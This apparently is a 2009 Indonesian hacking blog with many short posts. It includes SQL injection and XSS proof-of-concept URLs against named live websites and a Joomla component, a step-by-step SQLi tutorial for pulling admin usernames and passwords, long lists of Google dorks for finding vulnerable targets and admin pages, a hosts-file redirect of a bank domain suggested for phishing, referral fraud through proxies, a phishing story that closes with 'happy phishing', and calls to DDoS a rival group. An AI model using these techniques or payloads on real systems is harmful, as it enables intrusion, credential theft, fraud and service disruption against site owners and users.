Setelah buka Jatimcrew, saya buka situs Om Deddy Corbuzier, en Ternyata udah direpair toh!!!

Hahaha, ternyata gak ada apa-apanya di situs itu, lainnya cuma ke web laen...

NEW TARGET: blog para seleb, siapa tau bisa dihack... Ato... jangan-jangan Reselling Hosting dari blogger.com... (NGERI)

---END---

Jatimcrew is Back!

2009-09-16T16:15:00.000+07:00

Siang-siang abis bikin PR (Belom selesai), Nyalain komputer online lagi... trus buka Jatimcrew, Eeeh, udah bisa diakses, Selamat yee...
---AYO KITA BALAS PERBUATAN MALINGSHIT---

--END--

Buat dan Delete Folder dengan VB aka Visual Basic

2009-09-15T20:07:00.001+07:00

Ini ada beberapa Syntax untuk membuat atau delete Folder:
1. Delete Folder: (Hanya untuk Folder yg kosong)
RmDir (”c:\FolderTest”)
2. Delete ISI Folder (Hapusin dulu data-data yg ada di folder...)
Kill “c:\FolderTest\*.*”
3. Buat Folder:
MkDir (”c:\FolderTest”)

SELAMAT MENCOBA

Sumber: http://pondokindah.wordpress.com/
Penulis: Sarach

Jatimcrew kena DDoS sama Dark Malaysia (Dari seminggu lalu)

2009-09-14T17:08:00.000+07:00

TURUT BERDUKA CITA atas ke-DDoS-nya Jatimcrew... Padahal saya sering kesana tanpa Register, cari-cari ilmu gitu loh... (Tapi mungkin seringan ke HC sama Spyrozone... ^_^)
Bener-bener tuh Malingsial... (Tapi mungkin karena Jatimcrew juga yang suka hack Maling tersebut, tapi (katanya) belum ada penangkal DDoS...
Yep, intinya, jika anda sekalian mau DiDiOeS-sin si Dark Malaysia itu, kita tetapin kapan, jam berapa, detik berapa, mili detik berapa (???)
Bagi warga Jaticrew yang kena imbasnya, kalian bisa susun strategi disini (Ceileehh... Strategi...)
Yaudah, pokok'e, /me turut berduka cita aja...

---END---

Windows Hacking: Manipulasi Localhost

2009-09-13T20:33:00.000+07:00

Anda pasti tau tentang Localhost aka 127.0.0.1 (GAK TAU??? Gak apa-apa... Localhost itu adalah Jaringan/Alamat/IP/Local Web Directory Komputer kita sendiri... Jadi, kalo kita DDoS ke 127.0.0.1 namanya BUNUH DIRI!!!)
Nah, kita akan membuat Domain .com gratis untuk localhost kita (tapi KAYAKNYA cuma buat kompi kita sendiri deh...)

Tutorial-nye...
Buka Windows Explorer, lalu ketik di address bar: C:\WINDOWS\system32\drivers\etc
Buka file hosts dengan text editor dan anda akan melihat text seperti ini:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host

Paham penggunaan file ini?

Lalu, setelah itu dan sesudah itu, Kini, kita tambahkan baris baru dibawahnya seperti ini:
127.0.0.1 localhost klik-bca.com www.klik-bca.com
Lalu, setelah itu dan sesudah itu, Kini, kita ke web browser kita, lalu ketik di address bar, www.klik-bca.com, yang keluar bukannya klik-bca.com malah web directory lokal kita...

Jadi, intinye, kita bisa merubah domain web direktori lokal kita dengan domain lain, seperti kalo mau (pura-pura) deface/DDoS situs, kita masukin aja www.google.com di warnet... (hehehehe!!!) dan juga kita bisa phising dengan menghantarkan dari Facebook ke web direktori lokal komputer... Pokok'e terserah deh, be creative...

---END---
Sumber: www.spyrozone.net
Penulis Asli: SpyroKiD

Cara Kerja KumpulBlogger (Mungkin semua situs setipe KumpulBlogger juga pake system kayak gini...)

2009-09-13T11:18:00.002+07:00

OK, /me mau share sesuatu yang (mungkin) berharga bagi kalian!!!
Gini, saya kan liat di URL Ads-nya kumpulblogger tidak sama dengan situs yang diadvertise (beneran, kayaknya mirip Adsense...) Misalnya: Link yang di-iklankan: www.google.com, kalo misalnya cursor kitaarahin ke linknya, dibawah biasanya dikasih tau addressnya apa... (liat gak di KIRI-BAWAH???) Nah, addressnya begini: www.kumpulblogger.com/lempar.php?222/...... (dan embel-embel lainnya/Nomor ID/UID, dll. Misalnya: www.kumpulblogger.com/lempar.php?222/222/222/#222
Nah, di address www.kumpulblogger.com/lempar.php?222/222/222/#222, Terdapat script untuk menambah poin orang yang pasang script kumpulblogger + Redirector ke Link yang di-iklankan!!!

Dan yang ini nih yang bikin gw sebel:
KumpulBlogger itu bukan PPC (Pay Per Click) tapi PPUC (Pay Per Unique Click)
Pay Per Unique Click itu adalah mendapatkan uang hasil klik ads 1 orang!!! (Mungkin juga satu IP)
Jadi, kalo ada orang yang mengklik lebih dari 100 juta kali klik dalam satu hari tetep aja DI-ITUNG SATU KALI!!! (Sebel gak tuh???)

OK, saya sudah sharing semua yang saya tau tentang KumpulBlogger, dan kayaknya KumpulBlogger juga memonitor anggotanya deh, buktinya:
Setelah |)347|-| 807 klik ads-ku berturut-turut dan dia kasih tau tentang apa yang diperbuatnya dan saya juga mengaku di "Cerita Seorang Darkness Hacker" langsung esoknya saya udah gak dianggep!!!
Jadi, intinya, Security KumpulBlogger gak cuma sebatas Bot doank... tapi dia juga memonitor secara manual... (patut ditiru, teman-teman) Tapi ingat: "Nothing is Secure" bisa saja KumpulBlogger akan dihack juga... (sama kayak takdir Facebook...)

---END OF POSTING---

Bugs masih anget!!! (Barusan diupdate...) XSS + SQLi

2009-09-11T21:07:00.001+07:00

OK, bug ini adalah bug yang ada di Gyro v.5.0 dan ditemukan oleh OoN_Boy
Kita akan langsung liat apa bugsnya...

Google Dork:
"powered by Gyro V5.0"

Exploit:
http://localhost/home?op=cat&cid=[sql]
http://localhost/home?op=cat&cid=[Xss]

POC:
http://www.vansda.ca/home?op=cat&cid=29+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14--
http://www.vansda.ca/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB
http://www.phpmath.com/home?op=cat&cid=29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14--
http://www.phpmath.com/home?op=cat&cid=29"BAscriptBalert(123456)A/scriptB

INGET!
AB = <>
Copased from milw0rm.com
OoN_Boy juga meninggalkan pesan-pesan terakhir kepada (Greetz maksudnya...): Antisecurity[dot]Org www.BatamHacker.or.id www.MainHack.com www.ServerIsDown.org -
Vrs-hCk, c0li, h4ntu, Opay, Ipay, Paman, NoGe, H312Y, pizzyroot,
zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia,
str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

---END---
Special Thanks to OoN_Boy
Sumber: www.milw0rm.com

HOAX Virtual Card for you

2009-09-11T14:21:00.002+07:00

Ditemukan sebuah "HOAX" (Berita Bohong) yang menyatakan tentang virus yang menyebar dari Email yang bersubyek "Virtual Card For You"
Pernah dapet HOAX itu? Saya katakan sekali lagi LANGSUNG HAPUS!!! JANGAN DISEBARKAN, Jika anda tidak mau dikatain "HOAX-er"
HOAX-nya seperti ini:
VIRUS BARU

BACALAH DENGAN SEGERA, KIRIMKANLAH PESAN INI KE SEMUA NAMA DALAM DAFTAR ALAMAT ANDA.

VIRUS PALING JAHAT DARI YANG PERNAH ADA

Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang paling merusak!Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum ditemukan vaksin untuk mengalahkannya.

Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi informasi-informasi terpenting. Virus ini berjalan sebagai berikut :

1. secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda dengan judul “Sebuah Kartu Untuk Anda” ( Une Carte Pour Vous , atau A Card For You )

2. begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk, sehingga hard disk akan rusak secara permanen.

Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri. Jangan membuka e-mail dengan judul “Sebuah kartu virtual untuk Anda” ( Une Carte Virtuelle Pour Vous atau A Virtual Card For You ).

Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar orang, seperti saya sendiri, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.

AWAS!!!
Jangan terima kontak ” pti_bout_de_ chou @hotmail.com “. Ini virus yang akan memformat komputer anda. Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda.

Kalau anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar alamatnya, komputer anda juga akan terkena
-----------------------
Yang tulisan merah itu adalah bukti bahwa ini adalah HOAX!
So, HATI-HATI TEMAN-TEMAN!!! Janganlah percaya yang namanya HOAX!!!
Oke...
Oke...
Oke...
Janji yaa... (Soalnya saya gak mau dapet HOAX... dan kayaknya aku kena imbas orang gila yang kena virus yang bernama virut, jadinya saya dapet spam, spam, and spam...)

---END---
Sumber: Kumpulan HOAX

Lebih jauh tentang diriku...

2009-09-10T16:52:00.004+07:00

AWAS! JIKA ANDA TIDAK MEMBACANYA LANGSUNG DI BLOGNYA, ANDA AKAN SALAH PAHAM!!!
Ahaha... ngepost beginian, kayak gak ada kerjaan aja...
Tapi emang gw tukang nulis sih... (Copas lebih sering untuk tutor... ^_^)
ok,yang ingin mengenalku lebih jauh, tunggu bentar...

bentar....

bentar.....

bentar.....

bentar lagi....

sedikit lagi......

~~BERSAMBUNG...~~

Hahahahahaha!!!
Nih, saya bercerita tentang diriku...
Jadi, saya dulu (kira-kira kelas 3 SD) mengenal yang Namanya "Hacking" tapi dulu gambaran saya pada waktu itu tentang hacking adalah "Takeover", "Main Bobol", "Nyuri Passowrd", dll. Tapi saya pada saat itu gak hack-hackan karena gak ada internet... ^_^ baru tuh, pas kelas 6, saya maen mig33 dan banyak temen-temen sepermainan dota, sampe om-om pun maen...
Suatu hari, mau buka mig33, eh, takut pulsa membengkak, yaudah, buka google, search ~~bokep~~ hacking, nah, keluar tuh "mig33 tricks" ternyata pada ngakalin bot/engine-nya mig33 (dapet emoticons lah, dll.) nah, trus saya search yang lebih bermutu lagi yaitu: "friendster hacking" HAHAHAHAHA!!! Lalu, saya sangaaat tertarik untuk hacking, jadi di warnet apa lagi kalo bukan cari-cari tutorial, refrensi, dll. (Udah masuk dunia per-hackingan) Tapi pas itu tujuannya lain... Yaitu iseng, dll.
Keadaan saat itu: Saya pindah rumah
Lalu aku beli buku "Tekhnik Hacking and Overlay Friendster" untuk belajar Hacking Friendster, dan ternyata, "ADMINNYA FRIENDSTER SUDAH NGEPATCH SECURITY-NYA!!! CODE-CODE DI BUKU ITU TIDAK BERGUNA! TIDAK BERGUNA!!!" Tapi ternyata berguna juga...
Saya bisa belajar HTML dasar, JavaScript Dasar, XSS, CSRF, dll.
Hahahaha... Saya-pun mendalami ilmu perhackingan karena dirumahku sudah ada akses Internet (~~indomie telor kornet~~ HURRAY!!!)
Hyahahahahahaha... pas itu masih "Black" suka pake soceng malah dapet korban phising orang laen, dibuka atu-atu tapi gak saya apa-apain (buat ape juga??? gak berguna sama sekali!!)
Trus pekerjaan yang paling gak berguna adalah: Pake Opera, edit source code page, and save... Jadinya saya cuman edit-edit Gak Jelas doank, gak maksud, perubahannya cuma di kompi saya doank...

Nah, masa-masa kelabu pun selesai...
Udah masuk ke Hacker Center (tapi gak pernah regist), Echo, Yogyafree, Jasakom, Indonesian Coder, dll (dan gak pernah regist semua...) kecuali Fasthacker (saya udah regist, cari aja namanya X_Oblivion) membuat mata saya terbuka tentang Hacking...
Ternyata Hacking itu baik tidak ada yang jahat, tapi kalo menurut hukum TETEP jahat (iyalah, soalnya kan ILLEGAL OPERATIONS)
Yep, semuannya berlalu sampe sekarang...................

OK, itulah cerita panjang dari seorang ne0 d4rk fl00d3r

---END---

Cara Seorang Hacker: Mencari Admin Login tanpa mantra... (Iye, tapi pake google...)

2009-09-10T15:20:00.003+07:00

Wah... Postingan baru nih...
Biasanya kita abis SQLi langsyung ke admin login ato udah login, tapi kalo belom login ke admin, gak tau dimana admin loginnya...
TENANGLAH!!!
Kita bisa mendapatkannya hanya lewat Web Browser dan Google!!!
Caranya begini:
- Buka google (tapi jangan buka celana... hehehe...)
- Search dengan dork (Dork tau gak? Dork itu Keyword):
site:webtarget.com inurl:admin
site:webtarget.com intitle:Admin Login
site:webtarget.com intext:Admin Login
dll.

Udah dapet kalo pake dork diatas? berarti anda sudah menemukan admin login tersebut!!!
OK, kalo belum, coba kamu buat sendiri dorknya... (hehehe)

---END OF CONTENT---

Penyempurnaan Restart Code pada Symbian (untuk kebaikan)

2009-09-09T22:11:00.003+07:00

Ada yang tau Mig33? Mig33 dipopulerkan oleh IM3 (itu lhoo yang chatting itu...)
Nah, saya akan mengajarkan anda tentang cara restart code pada Symbian yang kemarin yaitu [TAB]
OK, kita hanya perlu web browser dan notepad...

Regist aja dulu kalo gak punya Mig33, kalo udah punya mig33 login dikomputer yee....
OK, saya akan membuat Dongeng lagi:

Disebuah Room di Mig33 yang bernama "Seks Bebas" (soalnya itu tuh room yang paling rame) Bilanglah si pelaku bernama ne0
Seks Bebas: ne0 is entered
Seks Bebas: Currently in room: ne0, --aaaaa--, wkwkwk, leo_macan, beauty_girlz, meta, devilzman, ml yuks, ajigile
--aaaaa--: Wew...
wkwkwk: Napa sih ni org?
leo_macan: biasa...
ne0: halo....
meta: aaaaa lagi stres
--aaaaa--: gw punya hape nokia baru
meta: symbian?
--aaaaa--: iye...
ne0: gw ol di-kompi
meta: swt
devilzman: ml-an yuk
ajigile: hape gw juga nokia
devilzman: gw juga symbian, tapi BTW, ML-AN YUKS!
ml yuks: wot?
meta: dodol
ne0: koq ngmng gk nyambung???
Seks Bebas: yo_attack has entered
ml yuks: gw blg "APA?"
meta: lw dodol!
leo_macan: si meta bukannya juga symbian juga?

---Ini bukan dalam chat:---
Wah, banyak orang tercela nih disini, kalo mereka udah ngacauin room tinggal gw TAB!
---Back to chat---

yo_attack: meta jelek!
meta: hp gw bukan symbian dodol!
yo_attack: hp gw yg symbian...
leo_macan: ajigile! lw ngapaen?
wkwkwk: dia lagi ml
ajigile: wena'e! gw lgi kesepian...
yo_attack: o yeah?
--aaaaa--: sori, sapa yg cari gw? tdi gw bru k wc...
--aaaaa--: leo, lw manggil gw?
leo_macan: GE-ER!

---
Mulai rusuh...
---

yo_attack: ajigile udah gile beneran yaa?
ajigile: ANJRID U!!!
leo_macan: H
leo_macan: A
leo_macan: H
leo_macan: A
Seks Bebas: ajigile start to kick leo_macan, 3 wotes required
yo_attack: lw mau dikick leo!
ne0: wele"
leo_macan: AAAAA!!!
ne0: udah gila yaa semuanya????
Seks Bebas: vote for kick leo_macan is failed
ajigile: ini giliran loe ne0!!!

---
Gw dah mau dikick! gw langsung buka notepad, tulis "Sudahlah![tab][tab]" lalu copy siap-siap paste ke mig33
---

Seks Bebas: ajigile start to kick ne0, 3 vote required
ne0: Sudahlah!
Seks Bebas: ajigile has left
Seks Bebas: ml_yuks has left
Seks Bebas: meta has left
Seks Bebas: --aaaaa-- has left
Seks Bebas: yo_attack has left
Seks Bebas: devilzman has left
Seks Bebas: wkwkwk has left
Seks Bebas: beauty_girlz has left
Seks Bebas: leo_macan has left

---
BUSEET! ternyata mereka semua pake symbian??? dasar fitnah!
---

Itulah cara hacking yang baik dan benar, udah tau kan konsepnya???
OK, Gutbai!!!

Bug Joomla Component

2009-09-08T20:49:00.000+07:00

Bug ditemukan oleh 599eme Man pada Jomla Component:
- SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=-2%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,
20,21,22,23,24,25,26,27,28,29

- Blind SQLi:
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=2 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2%20and%201=1 => True

http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=4 => False
http://www.site.com/index.php?option=com_joomlub&controller=auction&view=auction&task=edit&aid=2 and substring(@@version,1,1)=5 => True

---3|\||)---

Chat Facebook tanpa buka situs Facebooknya

2009-09-07T21:10:00.002+07:00

OK, saya lagi jalan-jalan ke Palembang Hacker Link nih, ketemu sama trik ini (ini sih bukan hacking, tapi Social Networking...) Yaa, itung-itung buat jatah nasi (lhoo? koq gak nyambung...) itung-itung kita bisa pake untuk kemudian hari... (kalo speed lagi lemotz...)
OK, inilah toolnya: DOWNLOAD DISINI!!!

Nah, tool ini (kayaknya lebih bisa dibilang "software") client untuk FB, kegunaanya adalah untuk chatting, memperbaharui status, dll. (coba sendiri!)

OK, EoP!!!

I'm Surrender!!! SQLi Tutorial banyak banget menurut mpu Marezzi!!! (AKU MENYERAAAHHH!!!)

2009-09-07T19:15:00.002+07:00

Kalo translate artikel dari milw0rm, trus panjang lagi itu saaaaaaaaaangaaaat susah dan saaaaaaaangaaaaaaat lama... Emank banyak sih artikel tentang SQLi...

OK deh, silahkan baca sendiri di SINI

AKU BERJANJI AKAN MEMBUAT ARTIKEL SQL INJECTION YANG LEBIH GAMPANG!

Peace...
ne0 d4rk fl00d3r

Bagi orang yang gak bangga sama Hacker yang ngehack situs-situs pas HUT RI, baca ini!

2009-09-05T23:14:00.002+07:00

Liat dari Kaskus
Saya sebenernya setuju-setuju aja ngedeface situs Maling pada saat itu, tetapi kalo situs negara sendiri, mungkin ada yang berpikiran begini:
"Mencerdaskan Kehidupan bangsa di Dunia Maya untuk menyadarkan mereka tentang bugs tersebut"
Saya sih setuju kalo begitu!
Kalo begini:
"Iseng"
-__- Saya gak setuju banget! Sebagai White Hat, saya gak terima! (Halah, apa sih?)
Jadi, bagi orang awam yang gak tau apa-apa, cobalah untuk tidak berprasangka buruk dulu, siapa tau mereka beralasan seperti alasan pertama...
r36r4|)5.
ne0 d4rk fl00d3r

Stupid Phising Revolution

2009-09-05T16:07:00.005+07:00

Ini adalah lanjutan dari Stupid Phising yang diceritakan bahwa Adi di-phish oleh Joe Cracker dan Facebook-nya di-deactive.
OK, inilah kelanjutannya:

Cerita ini hanyalah Fiksi belaka, jika ada kesamaan tokoh, mohon orang itu diceburkan kedalam kolam yang penuh dengan buaya lapar dan tidak cacat dan Karnivora! dan Rumahnya juga harus dijadikan sebagai penyembahan berhala, Kenapa? karena dicerita ini tidak ada Buaya Karnivora dan penyembahan berhala.

Stupid Phising
Revolution

Suatu Hari, Adi, seorang yang sudah di-"alert" oleh Joe Cracker pergi ke rumah pamannya yang seorang Hacker, Adi sudah tau kalau pamannya tidak akan crack dia, 1000000000%
Disana, dia juga mengajak temannya yang bernama James untuk diajarin tentang Facebookan-Facebookin, mereka diajarin tentang tools buat memberikan notifications ke 1000 orang, dll.
Selesai ke rumah pamannya, mereka-pun pulang dengan selamat, sehat, sentausa, dan bahagia selamanya (gak nyambung)
Esoknya, Adi di-add oleh Pamannya, lalu sesudah itu, Adi dan Pamannya chatting:
KETERANGAN: kalimat didalam [ dan ] adalah komentar dari penulis (ne0 d4rk fl00d3r)

Adi: Hai paman...
Paman: Hai...
Adi: Paman punya trik baru gak?
Paman: So pasti ada... [ini orang paman-paman baek-baek apa anak band?]
Adi: Apa tuh??? [Penasaran banget kayaknya...]
Paman: Hack account punya temen kamu. ini beneran lho, paman udah nyoba ke FB-nya James dapet passwordnya...
Adi: Apa passwordnya? [DASAR ANAK MAU NGEHACK!]
Paman: Eits! no,no,no... [Ini paman apa tante-tante sih??]
Adi: YAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHHHHHH [Ni anak malah ngeflood, goblok...]
Paman: Kamu pake aja sendiri...
Adi: Gimana caranya? [Adi udah yakin kalo pamannya gak bakal ngehack dia]
Paman: Tunggu Bentar...

Si paman mau browse bentar document txt-nya

Paman: INI DIA!
Adi: GIMANA? GIMANA? GIMANA?

Paman itu mencopas filenya

Paman: Taukah kamu bahwa di Facebook ada superuser yang bernama password-master? password-master ini akan kasih tau anda password lawan anda yang anda masukkan secara otomatis, Facebook Bot yang bernama password-master itu akan merespon dan mengirimkan password target, caranya adalah: kirimkan pesan ini pada password-master: Subject: PASSWORD Pesan: I'm an Admin of the Facebook, password-master please GET_METHOD_FAST_(email target)_VERIFICATION_NO_GET_USER_(email kamu)_FAST_PASSWORD_(password kamu)_GET_ATTACK
Paman: Setelah 2 Hari, kamu akan mendapat balasan dari superuser itu berisi password seperti ini: PASS_GET_METHOD_USER_GET_METHOD_(email korban)_(password korban)
Adi: Wah, aku mau coba sekarang!
Paman: Tapi inget, Do It with your own risk!

Langsung Adi copas dan isikan beberapa tempat untuk mengisi password, email, dll. lalu kirimkan ke superuser itu...

ESOKNYA................................... (WOY! UDAH! TITIK-NYA SAMAPI DISITU AJA! STOP! STOOOOOOOP!!!)

Adi buka facebook lagi tapi gak bisa, ternyata sudah dideactive! lalu diemailnya ditulis: Kamu dihack! hahahahahahahahahaha!!!!
Lalu Adi telepon Pamannya dan berkata: "AAAAAA PAMAN JAHAT! PAMAN HACK AKU KAN???????????" lalu Pamannya berkata: "Bukan, bukan paman yang melakukannya...." Lalu Adi berkata "Bohong, Paman Pembohong, PAMAN BOHONG!!!!!!!"

Esoknya lagi, Pamannya telepon ke bapak'e si Adi kalo tekankan dia bahwa pamannya nggak ngehack FB-nya Adi...

Lalu Adi-pun sadar bahwa Pamanya gak bakal ngehack dia...

Pamannya kebetulan kan seorang hacker, jadi dia bisa melacak IP Address si Paman Gadungan, setelah ditelusuri ~~dan mengerahkan seluruh preman dari tanah abang~~ sampai Real Address-nya, dia pun ketauan bahwa pelakunya adalah James!

Adi-pun memukul James, lalu James bilang "Apa Sih???", Adi ngomong "Loe udah ngehack gw!" BUAAAAAGH!!!! Adi-pun memukul lagi, Paman dan Ayahnya si Adi malah liatin sambil kayak main PS (Tangannya lagi kayak megang stik PS dan kayak mencet-mencet tombol PS) Memang Ayah dan Paman yang tidak sayang anak...
Teruskan bertarungnya: Adi memukul dan mendamage 300 ke James, lalu James menendang Adi dan mendamage Adi 280, lalu Adi menyundul James tetapi miss! karena James menghindar, lalu terjatuh dan James terdamage 5, karena James kestun, Adi-pun bisa melancarkan jurus terakhir, kerahkan preman-preman tanah abang! lalu semuanya mendamage James 999999999 Damage! dan...

Adi Just pwned James head! 000 Gold split!
Adi just drew Pers Blat!
James is left the game!

---GAME OVER!!!---

James pun menyerah...
Dia kasih account FB-nya Adi lagi...

Dan Adi-pun pulang dengan perasaan senang dan bahagia selamanya (perasaan ini bukan dongeng anak kecil deh...)
----------------END OF CERITA------------------------
Nah, udah tau kan konsep phising-nya?
OK, End of Postingan
Nah, happy phising!

Free Domain Box Hacking!

2009-09-05T12:21:00.003+07:00

Maaf bagi orang-orang yang menantikan SQLi 3, tetapi kita selingi yang ringan-ringan dulu yaa...
OK, saya sebenernya ingin sekali mendapatkan free domain dot com, tapi bayar semua, (males banget...) Ini demi kalina semua lhoo, supaya gak perlu .co.cc tapi udah .com (biar nanti orang-orang gak kayak gini:
Temen: Kamu buka apaan jadi pinter hacking?
Anda: Darkness Hacker
Temen: Address-nya apa?
Anda: www.darknezzhacker.co.cc
Temen: Masih .co.cc? ahh, gak jaman, pasti adminnya kere...
DDUUUUAAAAAAAAAARRRRR!!!!)
Ahaahahahahaha! Kita coba Free Domain Box (yang katanya systemnya gak bisa dibo'ongin) Yaitu saya beri nama "Hacking under Proxies" (YAIYALAH!)

Jadi begini Efeknya:
Kamu bisa merefer diri kamu sendiri berkali-kali sehingga kamu bisa dapet points

Konsep:
Merefer diri sendiri berulang-ulang kali

Sebenernya gak bisa dapet point... -__- Tapi kan bisa jadi bahan pelajaran bagi kalian semua.
LET'Z GO!!!
Persiapan:
- Beberapa Proxies
- Foxy Proxy biar lebih gampang (Mozilla Serigala Api ONLY!)
- Punya account untuk direfer
- Web Browser
- Notepad
- Jiwa
- Proxies (Perasaan udah 2 kali "Proxies" ditulis...)

Tutorial:
1. Masuk ke Free Domains Box, lalu login, lalu klik Refer other people
2. Copas Refer link yang ada signup-nya (yg bawah) ke Notepad
3. Logout, lalu pasang proxy
4. Buka Tab baru link yang tadi kamu copas tadi kamu copas lagi ke web browser kamu (di tab barunya yaa...)
5. Sign Up sesuai dengan Proxy, (misalnya kamu punya proxy Italy, kamu isi kota dan negara di Italy karena ternyata Free Domain Box sedikit pinter untuk scan IP kita dan Lokasi IP kita sesuai IP kita)
6. Selesaikan proses Sign Up anda (Email Verification, dll.)
7. Logout
8. Ganti Proxy
9. Kembali ke nomor 4 Sampai puas

Nah, udah tau kan sekarang, dan Free Domains Box itu agak sombong, coba liat screenshot INI
Karena saya udah coba Hack dan berhasil...
OK, Happy Hacking ^_^

SQL Injection Reloaded 2

2009-09-05T09:24:00.003+07:00

Inilah lanjutan dari SQL Injection yang lalu (maaf yaa kalo 2 postingan)
Lanjutan:
5. Mendapatkan nama table dan column
Jika versi MySQL-nya < 5 (i.e 4.1.33, 4.1.12...) kita harus menebaknya... Biasanya table bernama: user/s, admin/s, member/s Dan biasanya nama column-nya: username, user, usr, user_name, password, pass, passwd, pwd etc...
Contoh cek-nya: www.korbansqli.com/news.php?id=5 union all select 1,2,3 from admin/*
Coba kita main tebak-tebakan: www.site.com/news.php?id=5 union all select 1,username,3 from admin/* Kita masukin ke nomor 2 karena Angka yang ada tadi 2, jadi kita ganti 2 menjadi nama column Kalo salah, akan muncul error, dan jika benar, akan muncul di layar usernamenya seperti admin atau superadmin
Kita akan cari passwordnya www.site.com/news.php?id=5 union all select 1,password,3 from admin/* Jika error, gantilah nama yang lain selain password, jika benar, kita akan melihat password yang masih hash atau sudah plain text (sesuai databasenya)
Lalu, kita harus menyelesaikan Query ini (kata mpu Marezzi biar bagus :-) ) Pakailah Concat = concat()
Contoh: www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note: Mpu Marezzi berkata, dia masukin 0x3a itu adalah hex value (jadi 0x3a adalah value dari column)
To be Continued Again (BANYAK BANGET!!!)

SQL Injection Reloaded

2009-09-04T20:09:00.002+07:00

Duh, tadi mau membalas dendam pada forum para orang gila yaitu www.clancbs.com (saya gak tau kenapa bisa sebenci ini sama ntuh forum...)
Tapi becanda... coba aja liat di cerita Darkness Hacker biar tau apa alasannya... (and why it's invulnerable to SQLi???)
OK, saya baru ketemu sama SQLi menurut mpu Marezzi di www.milw0rm.com (Baru terbuka matanya en saya udah gak males baca Inggris lagi...) koq rasanya saya ketagihan SQLi yaa??? (soalnya kemaren cuma bolak-balik XSS aka Cross Site Scripting)
OK, kita ikutin aja deh si om Marezzi...
1. Cari korban digoogle (Semuanya ada di Google, kecuali gua dengan dork nama asli gw...)
dengan dork super banyak ini:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
